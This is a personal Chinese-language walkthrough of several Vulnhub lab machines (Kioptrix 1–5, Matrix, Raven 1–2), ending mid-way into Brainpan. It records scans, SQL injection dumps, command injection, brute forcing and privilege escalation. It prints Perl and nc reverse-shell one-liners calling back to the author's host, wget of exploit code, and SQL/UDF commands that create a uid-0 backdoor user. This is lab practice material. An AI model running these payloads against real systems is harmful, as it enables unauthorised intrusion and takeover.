Vulnhub 練習 === [TOC] # kioprtix 1 ## NMAP - 指令 `sudo nmap -T4 -A -v -O 192.168.0.188` ## 嘗試找可用的 exploit `http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b` - 針對 `mod_ssl` 以及 `OpenSSL` 版本去搜尋 exploit - openssl_too_open - http://www.voidcn.com/article/p-wwrkqqii-bdt.html - https://www.exploit-db.com/exploits/40347 - build 不起來,macos 的 openssl 環境難搞... - openfuck - https://www.exploit-db.com/exploits/764 - exploit 太舊惹,但有人修 - https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ - 還是卡在 openssl 環境 wtf ## 找尋其他滲透點 - `nmap -Pn --script vuln 192.168.0.188` ``` Host script results: |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14] | smb-vuln-cve2009-3103: | VULNERABLE: | SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) | State: VULNERABLE | IDs: CVE:CVE-2009-3103 | Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, | Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a | denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE | PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, | aka "SMBv2 Negotiation Vulnerability." | | Disclosure date: 2009-09-08 | References: | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14] ``` - 發現 Samba 好像可以 exploit,回頭去看看 Samba 版本 - Samba 2.2.1a - 尋找 exploit - https://www.exploit-db.com/exploits/10 - `gcc 10.c -o test` ## Win. - `./test -v -b 0 192.168.0.188` - got root shell - ![](https://i.imgur.com/m26QZOM.png) # kioprtix 2 ## NMAP ![](https://i.imgur.com/0h3OGtB.png) - 看到 80 port,先試著連看看是什麼 - 看到一個奇怪的登入頁面 - ![](https://i.imgur.com/STJ5taU.png) - dirsearch 看看有沒有可疑的檔案 - http://192.168.0.127/manual/index.html - 沒其他怪怪的東西 - sqlmap - `sqlmap -u "http://192.168.0.127/index.php" --data "uname=123&psw=123&btnLogin=Login" --risk 3` - 有洞! ``` --dbs available databases [1]: [*] webapp -D webapp --tables Database: webapp [1 table] +-------+ | users | +-------+ -D webapp -T users --columns Database: webapp Table: users [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | numeric | | password | non-numeric | | username | non-numeric | +----------+-------------+ -D webapp -T users -C id,password,username --dump Database: webapp Table: users [2 entries] +----+------------+----------+ | id | password | username | +----+------------+----------+ | 1 | 5afac8d85f | admin | | 2 | 66lajGGbla | john | +----+------------+----------+ ``` - 得到帳號密碼,登入後發現一個可以 ping 的頁面,直覺就是 cmdi - ![](https://i.imgur.com/UU9GGbP.png) - exploit - 頁面會 post `ping` 這個參數到 http://192.168.0.127/pingit.php - 嘗試使用 `|ls` 來 cmdi,果然成功 - 確認權限 `|id` - uid=48(apache) gid=48(apache) groups=48(apache) - 很可惜,還要提權 - 先用一個 reverse shell 方便操作 ## 提權 - reverse shell ``` perl -e 'use Socket;$i="192.168.0.60";$p=11221;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}; POST /pingit.php HTTP/1.1 Host: 192.168.0.127 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.0.127/pingit.php Content-Type: application/x-www-form-urlencoded Content-Length: 268 Connection: close Upgrade-Insecure-Requests: 1 ip=|perl+-e+'use+Socket%3b$i%3d"192.168.0.60"%3b$p%3d11221%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'&submit=submit ``` - `uname -a` - Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux - 找看看 `2.6.9-55.EL` 的提權 exploit - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2010/CVE-2010-4347 - 不行用! - https://github.com/SecWiki/linux-kernel-exploits/blob/master/2014/CVE-2014-3153/35370.c - 不行用! - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2010/CVE-2010-4073 - 不行用! - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2010/CVE-2010-3081 - 不行用! - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2009/CVE-2009-2698 - 可以用! - 記得到 /tmp 底下才有權限把檔案拉進來 ## exploit and win ``` sh-3.00$ id uid=48(apache) gid=48(apache) groups=48(apache) sh-3.00$ wget http://192.168.0.60:8021/36108.c --17:07:21-- http://192.168.0.60:8021/36108.c => `36108.c' Connecting to 192.168.0.60:8021... connected. HTTP request sent, awaiting response... 200 OK Length: 2,507 (2.4K) [text/plain] 0K .. 100% 170.78 MB/s 17:07:21 (170.78 MB/s) - `36108.c' saved [2507/2507] sh-3.00$ gcc 36108.c -o 36108 sh-3.00$ ./36108 sh: no job control in this shell sh-3.00# id uid=0(root) gid=0(root) groups=48(apache) sh-3.00# whoami root sh-3.00# ``` ## 後記:Linux 提權好 repo - https://github.com/SecWiki/linux-kernel-exploits/ # kioprtix 3 ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-15 01:43 CST Nmap scan report for 192.168.0.195 Host is up (0.0014s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds ``` ## 頁面 - 發現是 LotusCMS - 找看看漏洞,可不可以 RCE - 可以! - https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh ## exploit ``` http://192.168.0.195/index.php?page=index%27)%3B%24{system(%22id%22)}%3B%23 uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` - 先建立 reverse shell ``` http://192.168.0.195/index.php?page=index%27)%3B%24{system(%22nc%20-e%20/bin/sh%20192.168.0.60%2011221%22)}%3B%23 uname -a Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux ``` - 一樣找提權漏洞拔 - 提權好久都失敗 QQ - `cat /etc/passwd` - 發現有其他帳戶,但不知道密碼 - loneferret - dreg - 找看看密碼 grep "password" /home/* -r - 噴一堆東西,慢慢看 - 看到 `/home/gallery/gconfig.php` 有 db 帳密 ## exploit via database - /phpmyadmin 可以直接存取,登入 - 發現有奇怪的 table - dev_account - 裡面有兩組帳號跟密碼,hash 應該是 md5,直接拿去 cmd5 - loneferret/starwars - dreg/Mast3r - 想起來是前面 `/etc/passwd` 看到的帳戶 - 可以直接登入 ssh! - dreg 登入,沒什麼東西 QQ  - loneferret 登入有奇怪的檔案,檢查看看 - `cat .bash_history` 關鍵 - 看到有一個 `sudo ht` - 直接 `sudo ht` 執行竟然可以跑 - 檢查 `ht` 這個 binary 的權限,竟然是 root - 接著使用 `ht` 檢查 `/etc/sudoers` - 發現確實有改寫,讓 loneferret 可以用 root 權限執行 ht - 由於是 root,所以可以直接改寫 `/etc/sudoers` - 加入 `/bin/bash` 也可以直接用 root 執行 - 最後一步 - `sudo /bin/bash` - 拿到 root,win! # kioptrix 4 ## nmap ``` 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds ``` ## 80 PORT - 奇怪的登入介面 - 試著插入單引號,可以 sql injection! ## SQLMAP ``` sqlmap -u "http://192.168.0.14/checklogin.php" --data "myusername=1&mypassword=2&Submit=Login" sqlmap identified the following injection point(s) with a total of 409 HTTP(s) requests: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=1&mypassword=-8697' OR 1250=1250#&Submit=Login Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=1&mypassword=2' OR SLEEP(5)-- aIbA&Submit=Login --- [10:28:40] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 --os-shell 可以用,權限沒意外是 www-data 看了一下目錄,發現有 john 跟 robert 先建立後門備用 http://192.168.0.14/tmpbmjyj.php?cmd=ls http://192.168.0.14/tmpbmjyj.php?cmd=cat%20/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash john:x:1001:1001:,,,:/home/john:/bin/kshell robert:x:1002:1002:,,,:/home/robert:/bin/kshell 於是我們知道拿到 john 或 robert 的帳號密碼為優先 於是直接用 sqlmap dump Database: members Table: members [2 entries] +----+----------+-----------------------+ | id | username | password | +----+----------+-----------------------+ | 1 | john | MyNameIsJohn | | 2 | robert | ADGAdsafdfwt4gadfga== | +----+----------+-----------------------+ ``` ## ssh 使用 robert 登入後,發現是個 limit shell https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 這篇有提到,在限制 shell 的情況下有幾種方式可以繞過 ``` python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i ``` 很明顯第二種是我們要的,於是我們試著執行,成功逃脫! ## 試著提權 這個手上沒有好的環境,機器上也沒有 gcc 暫時放棄 ## back to sql injection 再胡亂 fuzz 的過程中,發現 sys_exec 竟然可以使用 ``` john'UNION SELECT sys_exec('sleep 10'),2,3# ``` 雖然沒有 output,但我們可以把東西輸出到 /tmp,反正都可以 ssh 了 ``` john'UNION SELECT sys_exec('id>/tmp/123'),2,3# ``` 我們用 `ssh` 去 `cat` 檔案發現竟然不能,因為建立檔案的權限是用 `root` 於是知道 `sys_exec` 是用 `root` 去執行系統指令的 既然這樣,我們就可以直接建立一個新的 root 帳號 ``` 先在 /tmp 建立一個用來創密碼的檔案 echo -e "meow\nmeow\n" > /tmp/meow john'UNION SELECT sys_exec('useradd -ou 0 -g 0 meow'),2,3# john'UNION SELECT sys_exec('cat /tmp/meow|passwd meow'),2,3# ``` ## win ``` su meow Password: meow root@Kioptrix4:/tmp# id uid=0(root) gid=0(root) groups=0(root) root@Kioptrix4:/tmp# whoami root root@Kioptrix4:/tmp# ``` # kioprtix 5 ## namp ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 16:59 CST Nmap scan report for kioptrix2014.host-only (10.37.129.3) Host is up (0.028s latency). Not shown: 998 filtered ports PORT STATE SERVICE 80/tcp open http 8080/tcp open http-proxy ``` ## 80 and 8080 - 80 port - html 有藏一行 - `<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">` - `pChart2.1.3/index.php` 有一個頁面 - 8080 port - 403 forbedden ## pChart2.1.3 - 使用 LFI 漏洞 - [https://www.exploit-db.com/exploits/31173](https://www.exploit-db.com/exploits/31173) - [http://10.37.129.3/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd](http://10.37.129.3/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd) - 沒找到 RCE 的漏洞,感覺 PHP 有機會 RCE,但看了一下沒結果 - 開始 fuzzing - fuzzing list 裡面找到 config - `usr/local/etc/apache22/httpd.conf` - 讀一下為什麼 8080 port 被 403 - 擋 user-agent - 改 `User-Agent: Mozilla/4.0` 就好了 ## phptax - 發現 8080 port 是 phptax - 使用 RCE 的漏洞 - [https://www.exploit-db.com/exploits/21665](https://www.exploit-db.com/exploits/21665) ``` GET /phptax/drawimage.php?pdf=make&pfilez=foo;sleep+5; HTTP/1.1 Host: 10.37.129.3:8080 User-Agent: Mozilla/4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=uf74gaucdp687p4prlj1s954p1 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` - 沒有回顯 - 配合 `pChart2.1.3 LFI` 來讀取輸出 - `id>/tmp/out.txt` - `http://10.37.129.3/pChart2.1.3/examples/index.php?Action=View&Script=/tmp/out.txt` - 權限為 `www` 基本上不能幹嘛 - 觀看 `/bin` 以及 `/usr/bin/` - 有 `perl` 那就使用 perl 的 reverse shell 拔 ## pwn & win - 有 `shell` 就方便了 ``` perl -e 'use Socket;$i="10.37.129.2";$p=11221;socket(S,PF\_INET,SOCK\_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr\_in($p,inet\_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'` ``` - `uname -a` - `FreeBSD Kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64` - 上網找 `FreeBSD 9.0 exploit` - [https://www.exploit-db.com/exploits/26368](https://www.exploit-db.com/exploits/26368) - 第一個就 `root` 了,真幸運www - 丟檔案進去,有 `nc` 很方便 - `nc -l 11221 < exploit.c` - `nc 10.37.129.2 11221 > exploit.c` - `pwn` & `root` - `gcc exploit.c -o exploit` - `./exploit` - win # Matrix - nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 01:22 CST Nmap scan report for 192.168.0.172 Host is up (0.0015s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 31337/tcp open Elite Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds ``` ## 80 & 31337 port - 80 port - 叫我跟著兔子走 - 兔子的圖片 http://192.168.0.172/assets/img/p0rt_31337.png - 啊直接掃就出來了給這個真無聊 - 31337 port - dirsearch - assets 可以存取,沒可疑的 - header - 沒東西 - 觀察 html - 有一段 base64 - `ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=` - 解出來是 `echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix` - 能試著理解他能把這段東西 echo 到這個檔案,那就在網頁目錄下直接存取(說實話這邊卡了一下,有點通靈...) - 下載 `192.168.0.172:31337/Cypher.matrix` - 內容是一段 brainfuck,CTF 題目做多就知道了 ``` +++++++++[->+++++++++<]>++++++++.<++++[->++++<]>++++++.++++++.<+++++++++[->---------<]>----.<++++++++[->++++++++<]>+++.--.<+++[->+++<]>++++.<++++++++[->--------<]>--------------.<++++++++[->++++++++<]>+++++.+++++++++.++++++.<+++[->---<]>------.<+++[->+++<]>++++.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>+++++++++.+++++.++++++.-----.<++++++++[->--------<]>---------------.<++++++++[->++++++++<]>+++++++++++++.<+++[->---<]>---.<++++[->++++<]>+++.--.---------.<+++[->+++<]>++++++.<+++++++++[->---------<]>-------.<++++++++[->++++++++<]>+.<++++[->++++<]>++.<+++++++++[->---------<]>--.<++++++++[->++++++++<]>+++++++.<+++[->+++<]>+++++.<++++[->----<]>.<+++[->+++<]>+++++.+.<++++++++[->--------<]>--------.<+++[->---<]>---.<+++++++++[->+++++++++<]>++++++.<+++[->---<]>-----.<+++[->+++<]>++.<+++[->---<]>---.<++++++++[->--------<]>--------.<++++++++[->++++++++<]>++++++++++++++++.<+++[->---<]>------.<++++[->++++<]>++..++++.--------.+++.<+++[->---<]>-----.<++++++++[->--------<]>----.<++++++++[->++++++++<]>+++++++++++.<+++++++[->-------<]>---------.<+++++++[->+++++++<]>++++++++++..<+++++++[->-------<]>-----------.<++++++++[->++++++++<]>++.<+++++[->-----<]>-..<++++++++[->--------<]>-----------.---.<++++++++[->++++++++<]>++++.<+++++[->+++++<]>++++++++.+++++.<+++[->---<]>------.<++++++[->------<]>-------.<+++++[->-----<]>-.<+++++[->+++++<]>++++++++.<+++++[->+++++<]>+++++++++.<++++[->++++<]>+.+.<++++[->----<]>----.<+++[->+++<]>++..<+++[->+++<]>++++.<++++++++[->--------<]>-------------.<+++[->---<]>---.<++++++[->++++++<]>+++++.<++++++[->------<]>-----.<++++++++[->++++++++<]>++++++.+++++++++.+++.<+++[->---<]>--.--.<+++[->+++<]>++++++.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>++++++++++++.<+++[->---<]>--.<++++[->++++<]>++.+.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>+++.+++.--------.<++++++++[->--------<]>---------------.<++++++++[->++++++++<]>+++.+++++.-------.<++++[->++++<]>+.<++++[->----<]>-.++.<++++[->++++<]>+.<+++[->---<]>------.<+++[->+++<]>++++.+.<+++++++++[->---------<]>--.<+++++++++[->+++++++++<]>++.----.<++++++++[->--------<]>---------------.<++++++[->++++++<]>+++++.<++++++[->------<]>-----.<++++++++[->++++++++<]>++++++++.-------.<++++[->++++<]>+++++.<++++[->----<]>-.<++++++++[->--------<]>-----.<+++++++++[->+++++++++<]>+.<+++[->---<]>----.<+++[->+++<]>++.----.<+++[->---<]>--.++.++.-.<++++++++[->--------<]>----.<+++++++++[->+++++++++<]>++++++.<+++[->---<]>-----.<+++[->+++<]>++.<+++[->---<]>---.<++++++++[->--------<]>--------.<+++++++[->+++++++<]>+++++++..<+++++++[->-------<]>-------.<+++++++++[->+++++++++<]>+++.--.+++++++.<+++++++++[->---------<]>--------.<+++++++++[->+++++++++<]>++++++++.<+++[->---<]>-.++++++.---.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>++++++++++++.+++++++++.<++++[->----<]>--.++++++++.<++++++++[->--------<]>-----------.<++++++++[->++++++++<]>+.<+++[->+++<]>++++.<+++[->---<]>-.<++++++++[->--------<]>----.<++++++++[->++++++++<]>++++++.+++.+++++.<+++[->---<]>-.<++++++++[->--------<]>----.<++++++++[->++++++++<]>+++.<+++[->+++<]>+++.+++..<+++[->---<]>----.--.<++++[->++++<]>+.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>++.+.--.---------.+++++.-------.<++++++++[->--------<]>-------.<++++++++[->++++++++<]>+++++++++++++++.---------.<++++++++[->--------<]>------.<++++++++[->++++++++<]>++++++++++++++++.<+++[->---<]>------.<++++[->++++<]>++..++++.--------.+++.<+++[->---<]>-----.<+++++++[->-------<]>-----.<+++++[->-----<]>--------.---.< ``` - 解開,得到一段文字 - `You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password` ## 爆破 ssh 密碼 - 使用 hydra ``` 建立密碼字典 for i in {{a..z},{A..Z},{0..9}}; do for j in {{a..z},{A..Z},{0..9}}; do echo "k1ll0r"$i$j>>wordlist;done;done hydra -l guest -P wordlist ssh://192.168.0.172 Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-02-18 01:02:45 [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task [DATA] attacking ssh://192.168.0.172:22/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://guest@192.168.0.172:22 [INFO] Successful, password authentication is supported by ssh://192.168.0.172:22 [22][ssh] host: 192.168.0.172 login: guest password: k1ll0r7n [STATUS] attack finished for 192.168.0.172 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found ``` ## ssh 登入 - 進去發現是 rbash - 很討厭 - 上網找了一下,發現直接在 ssh 時指定 termainal 就可以 bypass - `ssh guest@192.168.0.172 -t bash` - 成功! ## root & win - `sudo -l` ```=bash User guest may run the following commands on porteus: (ALL) ALL (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper (trinity) NOPASSWD: /bin/cp ``` - 直接 `sudo su` - root - `cat /root/flag` - win. ## 後記 - 產 wordlish 好工具 - mp64,待研究 - rbash 跳脫其他方法 - 用 vi - root 其他方法 - `sudo /usr/bin/bash` # Raven 1 ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 09:32 CST Nmap scan report for 172.20.10.2 Host is up (0.11s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds ``` ## 80 - 80 port 看到一個 web appllication - dirsearch - `/.DS_Store` 看起來比較有搞頭 - `/img`、`/js` 可以直接訪問 - 有一個 `/wordpress/` ## wordpress - 看到 wordpress 就使用開源的 vuln scanner 掃下去 - `wpscan --url raven.local/wordpress -evp -evt -eu` ``` [i] User(s) Identified: [+] michael | Detected By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] steven | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) ``` - ssh 看看 - michael/michael - 成功! ## michael shell - https://www.exploit-db.com/exploits/40839 - 失敗 - 試了好幾個提權都失敗 QQ - 有 wordpress 一定有 databases - 看看另外一個用戶的密碼先 - `cat wp-config.php |head -n 30` ``` /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'R@v3nSecurity'); ``` - 登入 mysql - `mysql -u root -pR@v3nSecurity` - dump password ``` mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress | +--------------------+ 4 rows in set (0.01 sec) mysql> use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 12 rows in set (0.00 sec) mysql> show columns from wp_users; +---------------------+---------------------+------+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +---------------------+---------------------+------+-----+---------------------+----------------+ | ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment | | user_login | varchar(60) | NO | MUL | | | | user_pass | varchar(255) | NO | | | | | user_nicename | varchar(50) | NO | MUL | | | | user_email | varchar(100) | NO | MUL | | | | user_url | varchar(100) | NO | | | | | user_registered | datetime | NO | | 0000-00-00 00:00:00 | | | user_activation_key | varchar(255) | NO | | | | | user_status | int(11) | NO | | 0 | | | display_name | varchar(250) | NO | | | | +---------------------+---------------------+------+-----+---------------------+----------------+ 10 rows in set (0.00 sec) mysql> select user_nicename,user_pass from wp_users; +---------------+------------------------------------+ | user_nicename | user_pass | +---------------+------------------------------------+ | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | +---------------+------------------------------------+ 2 rows in set (0.00 sec) ``` - 丟上去 cmd5 爆破 - https://www.cmd5.com - `$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/` - pink84 ## ssh & win - ssh 登入 - `sudo -l` ``` Matching Defaults entries for steven on raven: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User steven may run the following commands on raven: (ALL) NOPASSWD: /usr/bin/python ``` - 有 python 非常開心 - kioptrix 4 有做過 restricted shell 的問題 - 複習一下 ``` python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i ``` - 提權,get flag ``` $ sudo python -c 'import pty;pty.spawn("/bin/bash")' root@Raven:/home/steven# id uid=0(root) gid=0(root) groups=0(root) root@Raven:/home/steven# whoami root root@Raven:/home/steven# cat /root/flag4.txt ______ | ___ \ | |_/ /__ ___ _____ _ __ | // _` \ \ / / _ \ '_ \ | |\ \ (_| |\ V / __/ | | | \_| \_\__,_| \_/ \___|_| |_| flag4{715dea6c055b9fe3337544932f2941ce} CONGRATULATIONS on successfully rooting Raven! This is my first Boot2Root VM - I hope you enjoyed it. Hit me up on Twitter and let me know what you thought: @mccannwj / wjmccann.github.io root@Raven:/home/steven# ``` # Raven2 ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 09:32 CST Nmap scan report for 172.20.10.2 Host is up (0.11s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds ``` ## 80 - 80 port 看到一個 web appllication - dirsearch - `/.DS_Store` 看起來比較有搞頭 - `/img`、`/js` 可以直接訪問 - 有一個 `/wordpress/` - 多了一個 `vendor` ## wordpress - 看到 wordpress 就使用開源的 vuln scanner 掃下去 - `wpscan --url raven.local/wordpress -evp -evt -eu` ``` [i] User(s) Identified: [+] michael | Detected By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] steven | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) ``` ## exploit vendor - PHPMailer - http://raven.local/vendor/changelog.md - 版本:5.2.17 - 可以 RCE ! - https://www.exploit-db.com/exploits/40968 - https://www.exploit-db.com/exploits/40974 - 有了 RCE 能試著提權以及 dumpdb 看看! ## 提權 - `uname -a` - `Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux` - 試過一些提權腳本,但都失敗 - https://github.com/SecWiki/linux-kernel-exploits/ ## dump databases ``` mysql> select user_nicename,user_pass from wp_users; select user_nicename,user_pass from wp_users; +---------------+------------------------------------+ | user_nicename | user_pass | +---------------+------------------------------------+ | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | | steven | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. | +---------------+------------------------------------+ ``` - 密碼爆破出來:michael/LOLLOLl - 登入沒什麼,也沒辦法 ssh - 檢查 mysql 權限 - `ps -aux` - root,真開心! - 也許可以使用 UDF(User Define Function) - https://www.exploit-db.com/exploits/7856 - https://www.exploit-db.com/exploits/1181 - https://www.exploit-db.com/exploits/1518 ## Exploit & win - 先編好 .so 檔案 - 這邊跟 exploit.db 的語法不一樣 QQ - 多加 `-fPIC` ``` gcc -g -fPIC -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc 把 raptor_udf2.so 丟上去檔案 mysql -u root -pR@v3nSecurity mysql> use mysql; mysql> create table hack(line blob); mysql> insert into hack values(load_file('/tmp/raptor_udf2.so')); mysql> select * from hack into dumpfile '/usr/lib/mysql/plugin/hacked.so'; mysql> create function do_system returns integer soname 'hacked.so'; mysql> select * from mysql.func; select * from mysql.func; +-----------+-----+---------------+----------+ | name | ret | dl | type | +-----------+-----+---------------+----------+ | do_system | 2 | raptor_udf.so | function | +-----------+-----+---------------+----------+ 1 row in set (0.00 sec) mysql> select do_system('echo -e "meow\nmeow\n" > /tmp/meow'); mysql> SELECT do_system('useradd -ou 0 -g 0 meow'); mysql> SELECT do_system('cat /tmp/meow|passwd meow'); mysql> exit root@Raven:/tmp# su meow meow # id id uid=0(root) gid=0(root) groups=0(root) # whoami whoami root # ``` # Brainpan ## nmap ``` nmap 172.20.10.0/24 -sn Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 19:48 CST Nmap scan report for 172.20.10.1 Host is up (0.036s latency). Nmap scan report for 172.20.10.3 Host is up (0.030s latency). Nmap scan report for 172.20.10.8 Host is up (0.032s latency). Nmap done: 